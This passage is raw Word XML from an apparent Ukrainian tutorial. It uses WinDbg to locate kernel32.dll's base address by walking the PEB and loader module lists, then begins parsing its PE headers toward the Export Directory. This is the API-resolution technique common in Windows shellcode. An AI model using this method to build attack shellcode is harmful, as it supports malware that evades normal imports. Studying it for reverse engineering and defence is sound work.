        </w:rPr>
        <w:t>LDR_DATA_TABLE_ENTRY</w:t>
      </w:r>
      <w:r w:rsidR="00136A4A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BB0F89" w14:textId="6D1BCD65" w:rsidR="00F61980" w:rsidRPr="00E531BB" w:rsidRDefault="00F61980">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E531BB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">dt nt!_LDR_DATA_TABLE_ENTRY </w:t>
      </w:r>
      <w:r w:rsidRPr="009368F0">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0x1ee03484590</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B24A11" w14:textId="07084DDE" w:rsidR="0059587D" w:rsidRDefault="002D7BD8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="649FEF2D" wp14:editId="03E786CE">
            <wp:extent cx="6645910" cy="1463040"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="686723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238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9FE1" w14:textId="70C2EC62" w:rsidR="00371630" w:rsidRPr="00580E3B" w:rsidRDefault="00580E3B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">За офсетом </w:t>
      </w:r>
      <w:r w:rsidRPr="00580E3B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00580E3B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">20 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">бачимо список </w:t>
      </w:r>
      <w:r w:rsidR="00B97291" w:rsidRPr="00B97291">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>InInitializationOrderLinks</w:t>
      </w:r>
      <w:r w:rsidR="00F83A48">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="004142A6">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">перший елемент якого </w:t>
      </w:r>
      <w:r w:rsidR="00442112">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">є </w:t>
      </w:r>
      <w:r w:rsidR="004142A6">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>базов</w:t>
      </w:r>
      <w:r w:rsidR="001C22B9">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">ою </w:t>
      </w:r>
      <w:r w:rsidR="004142A6">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">адресою </w:t>
      </w:r>
      <w:r w:rsidR="00695F18">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>бібліотеки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE17CA0" w14:textId="37DB270F" w:rsidR="002D7BD8" w:rsidRDefault="00BD4467">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">За офсетом </w:t>
      </w:r>
      <w:r w:rsidRPr="00580E3B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00B82DDD">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00580E3B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">бачимо </w:t>
      </w:r>
      <w:r w:rsidR="00FE69C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FullDllName</w:t>
      </w:r>
      <w:r w:rsidR="00FE69C3">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidR="00AB1986" w:rsidRPr="00AB1986">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00FE69C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>KERNEL</w:t>
      </w:r>
      <w:r w:rsidR="00FE69C3" w:rsidRPr="00AB1986">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>32.</w:t>
      </w:r>
      <w:r w:rsidR="00FE69C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DLL</w:t>
      </w:r>
      <w:r w:rsidR="00AB1986" w:rsidRPr="00AB1986">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">", </w:t>
      </w:r>
      <w:r w:rsidR="00AB1986">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">отже ця структура дійсно відповідає </w:t>
      </w:r>
      <w:r w:rsidR="00983BC9">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">шуканій </w:t>
      </w:r>
      <w:r w:rsidR="00AB1986">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>бібліотеці</w:t>
      </w:r>
      <w:r w:rsidR="00913046">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747A6A86" w14:textId="77777777" w:rsidR="00371630" w:rsidRPr="00371630" w:rsidRDefault="00371630">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62AC15D5" w14:textId="3FB46F2A" w:rsidR="005265C8" w:rsidRDefault="00B37B03">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.8.</w:t>
      </w:r>
      <w:r w:rsidR="00770C7F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003900EB">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Поглянемо на перший елемент </w:t>
      </w:r>
      <w:r w:rsidR="008B608B" w:rsidRPr="008B608B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>InInitializationOrderLinks</w:t>
      </w:r>
      <w:r w:rsidR="008B608B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD41AE3" w14:textId="7D6F2827" w:rsidR="00AD536D" w:rsidRPr="00790862" w:rsidRDefault="00AD536D">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00790862">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>dx -r1 (*((ntdll!_LIST_ENTRY *)0x1ee034845b0))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116E2C2B" w14:textId="6EC05805" w:rsidR="000C53F3" w:rsidRDefault="006458DD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63FDB58B" wp14:editId="4C155AE0">
            <wp:extent cx="6645910" cy="825500"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1213416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16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9696" w14:textId="2CB522D5" w:rsidR="006458DD" w:rsidRPr="00992293" w:rsidRDefault="006E7FB5">
      <w:r w:rsidRPr="00F654C8">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Бачимо базову адресу</w:t>
      </w:r>
      <w:r w:rsidR="007734C8">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00563092" w:rsidRPr="00AC0830">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0x7ffc9ec40000</w:t>
      </w:r>
      <w:r w:rsidR="00F654C8">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B85AF3">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002935D1">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Таку саму адресу ми бачили в </w:t>
      </w:r>
      <w:r w:rsidR="002935D1" w:rsidRPr="00992293">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>!peb</w:t>
      </w:r>
      <w:r w:rsidR="00992293" w:rsidRPr="00992293">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8F9E98" w14:textId="77777777" w:rsidR="00C46DF8" w:rsidRDefault="00C46DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6530BC60" w14:textId="77777777" w:rsidR="00693A5A" w:rsidRPr="001B4702" w:rsidRDefault="00693A5A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58C21BBD" w14:textId="2317C359" w:rsidR="00002E91" w:rsidRPr="00002E91" w:rsidRDefault="00DB0413">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Отже, п</w:t>
      </w:r>
      <w:r w:rsidR="001B2B54">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">ошук базової адреси </w:t>
      </w:r>
      <w:r w:rsidR="001B2B54" w:rsidRPr="00C46DF8">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>kernel</w:t>
      </w:r>
      <w:r w:rsidR="001B2B54" w:rsidRPr="00C46DF8">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>32.</w:t>
      </w:r>
      <w:r w:rsidR="001B2B54" w:rsidRPr="00C46DF8">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:r w:rsidR="001B2B54" w:rsidRPr="001B2B54">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001B2B54">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">буде </w:t>
      </w:r>
      <w:r w:rsidR="00002E91">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>виглядати таким чином:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAB1B31" w14:textId="77777777" w:rsidR="00002E91" w:rsidRPr="00002E91" w:rsidRDefault="00002E91" w:rsidP="0000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002E91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Find kernel32.dll base address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223EFEB2" w14:textId="77777777" w:rsidR="00002E91" w:rsidRPr="00002E91" w:rsidRDefault="00002E91" w:rsidP="0000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002E91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002E9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</w:t>
      </w:r>
      <w:r w:rsidRPr="00002E9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gs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:</w:t>
      </w:r>
      <w:r w:rsidRPr="00002E91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x60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             </w:t>
      </w:r>
      <w:r w:rsidRPr="00002E91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PEB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BDA89C" w14:textId="77777777" w:rsidR="00002E91" w:rsidRPr="00002E91" w:rsidRDefault="00002E91" w:rsidP="0000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002E91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002E9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</w:t>
      </w:r>
      <w:r w:rsidRPr="00002E9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002E91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x18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]          </w:t>
      </w:r>
      <w:r w:rsidRPr="00002E91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LDR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FA607C" w14:textId="77777777" w:rsidR="00002E91" w:rsidRPr="00002E91" w:rsidRDefault="00002E91" w:rsidP="0000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002E91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002E9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</w:t>
      </w:r>
      <w:r w:rsidRPr="00002E9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002E91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x20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]          </w:t>
      </w:r>
      <w:r w:rsidRPr="00002E91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InMemoryOrderModuleList (1st entry)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B543989" w14:textId="77777777" w:rsidR="00002E91" w:rsidRPr="00002E91" w:rsidRDefault="00002E91" w:rsidP="0000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002E91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002E9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</w:t>
      </w:r>
      <w:r w:rsidRPr="00002E9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                 </w:t>
      </w:r>
      <w:r w:rsidRPr="00002E91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2 ntdll.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092FF100" w14:textId="77777777" w:rsidR="00002E91" w:rsidRPr="00002E91" w:rsidRDefault="00002E91" w:rsidP="0000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002E91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002E9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</w:t>
      </w:r>
      <w:r w:rsidRPr="00002E9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                 </w:t>
      </w:r>
      <w:r w:rsidRPr="00002E91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3 kernel32.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3D3145" w14:textId="77777777" w:rsidR="00002E91" w:rsidRPr="00002E91" w:rsidRDefault="00002E91" w:rsidP="0000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002E91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002E9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</w:t>
      </w:r>
      <w:r w:rsidRPr="00002E9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002E91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x20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]          </w:t>
      </w:r>
      <w:r w:rsidRPr="00002E91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InInitializationOrderLinks (1st entry)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3997D43F" w14:textId="77777777" w:rsidR="00002E91" w:rsidRPr="00002E91" w:rsidRDefault="00002E91" w:rsidP="0000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002E91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002E9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Kernel32], </w:t>
      </w:r>
      <w:r w:rsidRPr="00002E9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002E9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002E91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kernel32.dll base address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E4CF9E" w14:textId="77777777" w:rsidR="00F654C8" w:rsidRPr="00002E91" w:rsidRDefault="00F654C8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47A99F94" w14:textId="77777777" w:rsidR="003B502C" w:rsidRPr="001D4BCB" w:rsidRDefault="003B502C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="412FF1A7" w14:textId="2CFAB310" w:rsidR="00D43A4C" w:rsidRDefault="00D43A4C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C68FAE4" w14:textId="665C4188" w:rsidR="00720946" w:rsidRPr="00AC2524" w:rsidRDefault="00991A4E" w:rsidP="00774391">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD3E20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00E66DE0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001C18D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Пошук</w:t>
      </w:r>
      <w:r w:rsidR="00E66DE0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00354E9B" w:rsidRPr="00CD3E20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Export Directory</w:t>
      </w:r>
      <w:r w:rsidR="00EE527D" w:rsidRPr="00CD3E20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r w:rsidR="00EE527D" w:rsidRPr="00E66DE0">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kernel32.dll</w:t>
      </w:r>
      <w:r w:rsidR="00EE527D" w:rsidRPr="00CD3E20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6339224D" w14:textId="2CF1552C" w:rsidR="00BD6E04" w:rsidRDefault="00B84E2D" w:rsidP="00FF430F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1. </w:t>
      </w:r>
      <w:r w:rsidR="007B70E0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Поглянемо на заголовок бібліотеки</w:t>
      </w:r>
      <w:r w:rsidR="005C7B7C" w:rsidRPr="005C7B7C">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="005C7B7C" w:rsidRPr="005C7B7C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DOS</w:t>
      </w:r>
      <w:r w:rsidR="005C7B7C" w:rsidRPr="005C7B7C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005C7B7C" w:rsidRPr="005C7B7C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>header</w:t>
      </w:r>
      <w:r w:rsidR="005C7B7C" w:rsidRPr="005C7B7C">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00B17926">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C16012D" w14:textId="6203C18A" w:rsidR="00720946" w:rsidRPr="00B84E2D" w:rsidRDefault="00FF430F" w:rsidP="00774391">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B84E2D">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>dt</w:t>
      </w:r>
      <w:r w:rsidRPr="00B84E2D">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> _</w:t>
      </w:r>
      <w:r w:rsidRPr="00B84E2D">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>IMAGE</w:t>
      </w:r>
      <w:r w:rsidRPr="00B84E2D">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00B84E2D">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>DOS</w:t>
      </w:r>
      <w:r w:rsidRPr="00B84E2D">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00B84E2D">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>HEADER</w:t>
      </w:r>
      <w:r w:rsidRPr="00B84E2D">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7ffc9ec40000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBD8ED6" w14:textId="7ECFD6B9" w:rsidR="0022699B" w:rsidRPr="0022699B" w:rsidRDefault="0025166F" w:rsidP="00774391">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="066D7444" wp14:editId="12A92220">
            <wp:extent cx="6645910" cy="1047115"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="200839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945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C363" w14:textId="21E3A41F" w:rsidR="00B84E2D" w:rsidRPr="00BF647E" w:rsidRDefault="00280ED1" w:rsidP="00774391">
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">За офсетом </w:t>
      </w:r>
      <w:r w:rsidRPr="002C0D67">
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="002C0D67">
        <w:t>03</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="002C0D67">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>б</w:t>
      </w:r>
      <w:r w:rsidR="00B84E2D">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">ачимо </w:t>
      </w:r>
      <w:r w:rsidR="00B84E2D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00B84E2D" w:rsidRPr="002C0D67">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00B84E2D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lfanew</w:t>
      </w:r>
      <w:r w:rsidR="002C0D67">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>. Це значення є офсетом</w:t>
      </w:r>
      <w:r w:rsidR="0003181C">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="002C0D67">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> за яким знаходиться інший заголовок</w:t>
      </w:r>
      <w:r w:rsidR="001C67D2">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> бібліотеки</w:t>
      </w:r>
      <w:r w:rsidR="002C0D67">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001C67D2">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="002C0D67" w:rsidRPr="002C0D67">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>NT header</w:t>
      </w:r>
      <w:r w:rsidR="001C67D2">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00B46FAC">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00512091" w:rsidRPr="00512091">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00FE5F5D" w:rsidRPr="00BF647E">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00FE5F5D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00FE5F5D" w:rsidRPr="00BF647E">
        <w:t>240 = 240</w:t>
      </w:r>
      <w:r w:rsidR="00FE5F5D" w:rsidRPr="00BF647E">
        <w:rPr>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="000730FE" w:rsidRPr="00BF647E">
        <w:t xml:space="preserve"> =</w:t>
      </w:r>
      <w:r w:rsidR="00F3749E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidR="00F3749E" w:rsidRPr="00BF647E">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00F3749E" w:rsidRPr="00BF647E">
        <w:rPr>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidR="006346C9" w:rsidRPr="00BF647E">
        <w:t xml:space="preserve"> = 0</w:t>
      </w:r>
      <w:r w:rsidR="006346C9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xf</w:t>
      </w:r>
      <w:r w:rsidR="006346C9" w:rsidRPr="00BF647E">
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6182627A" w14:textId="77777777" w:rsidR="00FE5F5D" w:rsidRPr="00BF647E" w:rsidRDefault="00FE5F5D" w:rsidP="00774391"/>
    <w:p w14:paraId="513163C9" w14:textId="633127D9" w:rsidR="004E36A8" w:rsidRPr="004E36A8" w:rsidRDefault="00BF647E" w:rsidP="00774391">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF647E">
        <w:t xml:space="preserve">2.2. </w:t>
      </w:r>
      <w:r w:rsidR="004E36A8">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Додаємо офсет до</w:t>
      </w:r>
      <w:r w:rsidR="00DC092E" w:rsidRPr="0056638D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DC092E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>базової</w:t>
      </w:r>
      <w:r w:rsidR="004E36A8">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> адреси</w:t>
      </w:r>
      <w:r w:rsidR="004E36A8" w:rsidRPr="0056638D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004E36A8">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">і переходимо до </w:t>
      </w:r>
      <w:r w:rsidR="00ED09EF" w:rsidRPr="002C0D67">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>NT header</w:t>
      </w:r>
      <w:r w:rsidR="00ED09EF">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BE96B0" w14:textId="616C69FE" w:rsidR="0069470E" w:rsidRPr="00E531BB" w:rsidRDefault="007B4553" w:rsidP="00774391">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E531BB">
        <w:rPr>
